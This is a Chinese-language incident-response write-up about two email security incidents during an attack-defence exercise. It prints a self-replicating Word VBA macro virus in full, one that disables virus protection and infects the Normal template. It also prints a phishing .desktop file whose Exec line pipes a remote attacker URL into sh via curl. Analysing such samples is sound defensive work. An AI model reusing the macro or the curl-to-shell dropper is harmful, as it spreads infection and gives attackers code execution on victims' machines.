一次攻防演练值守期间,收到客户上报两起邮件相关的安全事件,收到事件上报后立即展开排查处理
事件一,一员工在清理邮箱历史邮件时,触发了天擎的病毒实时查杀告警,提示该邮件为病毒邮件,疑似office文档类病毒,于是该员工上报寻求排查处理。
事件二,一员工收到主题为“关于开展网络安全自查工作通知”的邮件,根据员工安全意识判断与期间是攻防演练中,怀疑为攻击队恶意投放的钓鱼邮件,于是上报安全部进行排查处理。
拿到邮件备份样本,发现其具有附件文件,将附件保存至虚拟机,使用天擎进行病毒查杀,其中“工作收入证明(稳定工作版).doc”文档报毒,类型为office文档类病毒,初步怀疑为word文档的宏病毒文件。
使用word打开文件,查看宏代码区域,确实存在宏代码,代码如下:'Close()Open()Close()Open()
Private Sub Document_Open()
On Error Resume Next
Options.VirusProtection = False
EnableCancelKey = wdCancelDisabled
Set maci = MacroContainer.VBProject.VBComponents.Item(1)
Set macic = maci.codemodule
ns$ = Left(macic.Lines(1, 1), 21)
Set inf = NormalTemplate: nsi$ = ns$ + "Close()"
If MacroContainer = inf Then Set inf = ActiveDocument: nsi$ = ns$ + "Open()"
Set infc = inf.VBProject.VBComponents
Set infi = infc.Item(1)
Set infic = infi.codemodule
infi.Name = "ThisDocument"
For mx = 2 To infc.Count
infc.Remove infc.Item(2)
Next mx
If infic.countlines <> macic.countoflines Then
infic.deletelines 1, infic.countoflines
For coco = 1 To macic.countoflines
infic.insertlines coco, macic.Lines(coco, 1)
Next coco
infic.replaceline 1, nsi$
End If
If Left(ActiveDocument.Name, 8) <> Mid$(macic.Lines(1, 1), 13, 8) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
EnableCancelKey = wdCancelDisabled
End Sub
'ThisDocument v 1.0 1999
通过宏代码可以很明显地看出一些值得怀疑的行为,例如:On Error Resume Next:
遇到错误时,代码会继续执行下一条指令,而不是停止。
Options.VirusProtection = False:
关闭 Word 的病毒保护功能。
EnableCancelKey = wdCancelDisabled:
禁用取消键,这意味着用户无法通过按 Ctrl + S 来中断宏的执行。
这三条代码一般非正常逻辑需要,符合病毒代码段需要。 结合静态与动态分析,该文件确实为病毒文件,宏代码内容与文档操作、信息获取相关,并没有具体的攻击行为或驻留行为,员工反馈该邮件为2016年的历史邮件,威胁情报也显示为2017年的病毒文件,危害较小,通知该员工进行文件删除即可。
一员工疑似收到钓鱼邮件,根据发件邮箱与邮件内容判断:
通过邮件内容不难看出,邮件诱导用户下载“自查工具”压缩包,里面不出意外就是攻击者的恶意文件,提取压缩包内容进行分析。 解压后为一个.desktop文件,记事本打开,很简单的一段回连测试代码。
[Desktop Entry]
Name[zh_CN]=自查工具
Type=Application
Exec=bash -c "curl http://101.xxx.xxx.158:13338/|sh"
Terminal=false
Icon=deepin-defender
攻击IP有了,在设备上进行IP封堵与流量排查,文件特征MD5加入黑名单,通知相关员工提高安全意识。 钓鱼邮件是一种常见的网络攻击手段,攻击者通常会伪装成合法的发件人,发送带有恶意链接或附件的邮件,诱骗收件人点击链接或打开附件,进而窃取个人信息或进行其他恶意行为。- 建立完善的邮件过滤系统:通过技术手段对邮件进行过滤,识别并拦截钓鱼邮件。
- 提高员工安全意识:定期开展网络安全培训,让员工了解钓鱼邮件的识别方法,提高警惕性。
- 建立应急响应机制:及时发现并处置钓鱼邮件攻击事件,减少损失。
- 加强与相关部门的合作:与公安、通信管理局等部门加强合作,共同打击网络犯罪。
总之,针对钓鱼邮件攻击,防守方需要建立多层次的防范体系,提高员工安全意识,加强技术手段和应急响应能力,以保障企业的网络安全。同时,对于任何形式的网络攻击,都应该采取零容忍的态度,及时发现并处理,维护网络空间的健康和稳定。
文章来源: http://mp.weixin.qq.com/s?__biz=MzU3Mzg1NzMyNw==&mid=2247484842&idx=1&sn=25bd5aac68f9251360e8e3185cb61096&chksm=fc35109adc0f1c62ded692879da8057ca3a041020e8d7476b33c0b41dc39d969ad2aff1e7964&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh